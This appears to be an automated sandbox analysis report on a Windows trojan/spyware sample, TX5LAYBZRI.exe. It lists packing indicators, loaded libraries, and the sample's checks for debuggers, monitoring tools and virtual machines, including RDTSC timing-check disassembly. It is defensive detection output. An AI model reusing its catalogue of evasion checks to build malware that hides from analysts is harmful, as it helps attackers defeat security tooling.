Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00B971E0 appears 47 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00B9CAA0 appears 64 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00BACD40 appears 80 times
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: String function: 00BD50A0 appears 101 times
Source: TX5LAYBZRI.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: TX5LAYBZRI.exeStatic PE information: Section: abkqriqx ZLIB complexity 0.9942570729725911
Source: TX5LAYBZRI.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@9/2
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00B9255D
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00B929FF
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: TX5LAYBZRI.exeVirustotal: Detection: 47%
Source: TX5LAYBZRI.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: TX5LAYBZRI.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSection loaded: kernel.appcore.dllJump to behavior
Source: TX5LAYBZRI.exeStatic file information: File size 4485632 > 1048576
Source: TX5LAYBZRI.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: TX5LAYBZRI.exeStatic PE information: Raw size of abkqriqx is bigger than: 0x100000 < 0x1ba600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeUnpacked PE file: 0.2.TX5LAYBZRI.exe.b90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;abkqriqx:EW;csfzocsp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;abkqriqx:EW;csfzocsp:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: TX5LAYBZRI.exeStatic PE information: real checksum: 0x453b98 should be: 0x44a30c
Source: TX5LAYBZRI.exeStatic PE information: section name:
Source: TX5LAYBZRI.exeStatic PE information: section name: .idata
Source: TX5LAYBZRI.exeStatic PE information: section name:
Source: TX5LAYBZRI.exeStatic PE information: section name: abkqriqx
Source: TX5LAYBZRI.exeStatic PE information: section name: csfzocsp
Source: TX5LAYBZRI.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_3_0211C9B9 push eax; ret 0_3_0211CA81
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_3_0211C9B9 push eax; ret 0_3_0211CA81
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_3_0211C9B9 push eax; ret 0_3_0211CA81
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F141D0 push eax; mov dword ptr [esp], edx0_2_00F141D5
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C12340 push eax; mov dword ptr [esp], 00000000h0_2_00C12343
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C4C7F0 push eax; mov dword ptr [esp], 00000000h0_2_00C4C743
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BEE92D push es; retf 0_2_00BEE92E
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BD0AC0 push eax; mov dword ptr [esp], 00000000h0_2_00BD0AC4
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BF1430 push eax; mov dword ptr [esp], 00000000h0_2_00BF1433
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00C139A0 push eax; mov dword ptr [esp], 00000000h0_2_00C139A3
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00BEDAD0 push eax; mov dword ptr [esp], edx0_2_00BEDAD1
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00F19F40 push dword ptr [eax+04h]; ret 0_2_00F19F6F
Source: TX5LAYBZRI.exeStatic PE information: section name: abkqriqx entropy: 7.95457753765941

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 12E09F9 second address: 12E0A0B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FF108C7BF06h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 12E0A0B second address: 12E0A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461ACD second address: 1461AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF108C7BF17h 0x00000008 jp 00007FF108C7BF06h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461AF6 second address: 1461B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF108873976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B00 second address: 1461B04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B04 second address: 1461B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B0A second address: 1461B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B10 second address: 1461B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B14 second address: 1461B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461B18 second address: 1461B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FF108873976h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461CEE second address: 1461D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF0Ah 0x00000009 jl 00007FF108C7BF06h 0x0000000f popad 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461D0B second address: 1461D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461D0F second address: 1461D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461FE9 second address: 1461FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1461FED second address: 1462008 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF108C7BF06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF0Ah 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462008 second address: 1462014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462014 second address: 1462018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621B3 second address: 14621B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621B9 second address: 14621BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621BF second address: 14621C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14621C8 second address: 14621CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146243F second address: 1462443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462443 second address: 1462447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1462447 second address: 1462450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14645FA second address: 146462D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007FF108C7BF06h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f adc dx, 2942h 0x00000014 push 00000000h 0x00000016 add dword ptr [ebp+122D253Fh], eax 0x0000001c push 361DCACEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 jmp 00007FF108C7BF0Eh 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146462D second address: 1464633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146474E second address: 146475D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146475D second address: 1464765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464765 second address: 14647FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FF108C7BF08h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov edx, ebx 0x00000023 or dword ptr [ebp+122D1AA7h], ebx 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D19EBh], ecx 0x00000031 call 00007FF108C7BF09h 0x00000036 pushad 0x00000037 jmp 00007FF108C7BF15h 0x0000003c jmp 00007FF108C7BF11h 0x00000041 popad 0x00000042 push eax 0x00000043 pushad 0x00000044 jmp 00007FF108C7BF13h 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FF108C7BF18h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14647FD second address: 1464846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FF108873986h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007FF10887397Bh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464846 second address: 146485E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jne 00007FF108C7BF06h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 146485E second address: 14648A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a adc cx, 0D0Fh 0x0000000f push 00000003h 0x00000011 add ecx, 5CEAFE56h 0x00000017 push 00000000h 0x00000019 xor cx, 19F0h 0x0000001e push 00000003h 0x00000020 mov edi, 48F11A41h 0x00000025 push B3C6BAB3h 0x0000002a pushad 0x0000002b pushad 0x0000002c jl 00007FF108873976h 0x00000032 ja 00007FF108873976h 0x00000038 popad 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464980 second address: 14649A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FF108C7BF12h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jo 00007FF108C7BF18h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14649A5 second address: 14649A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1464A82 second address: 1464A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14770E6 second address: 14770EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14770EC second address: 14770F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483818 second address: 1483821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483AC8 second address: 1483AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483D38 second address: 1483D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1483D3D second address: 1483D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FF108C7BF06h 0x0000000a jbe 00007FF108C7BF06h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 148402E second address: 1484032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484032 second address: 1484047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF108C7BF06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FF108C7BF06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484047 second address: 148404B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14841C7 second address: 14841E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF108C7BF19h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14841E5 second address: 14841EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14841EB second address: 14841F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14843A2 second address: 14843A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484564 second address: 1484568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484568 second address: 148456C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 14847CB second address: 14847E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007FF108C7BF0Fh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484A90 second address: 1484AB3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF108873989h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484AB3 second address: 1484AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484AB7 second address: 1484AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873985h 0x00000007 jmp 00007FF108873982h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1484AE2 second address: 1484AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF108C7BF06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 1485289 second address: 148528D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
